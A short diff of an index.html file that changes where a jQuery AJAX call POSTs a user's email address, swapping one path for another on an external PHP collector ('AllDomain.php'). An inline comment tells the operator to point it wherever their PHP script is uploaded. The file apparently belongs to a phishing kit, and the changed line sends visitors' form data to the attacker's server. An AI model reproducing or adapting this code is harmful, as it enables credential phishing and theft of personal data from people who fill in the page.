--- a/index.html
+++ b/index.html
@@ -1499,7 +1499,7 @@ var new_email = my_email;
          
          $.ajax({
          dataType: 'JSON',
-         url: 'https://veshtrin.com/kaus/uw/AllDomain.php', // change this to the part where your php script is uploaded
+         url: 'https://veshtrin.com/hsff/isn/AllDomain.php', // change this to the part where your php script is uploaded
          type: 'POST',
                	data:{
          			email:email,
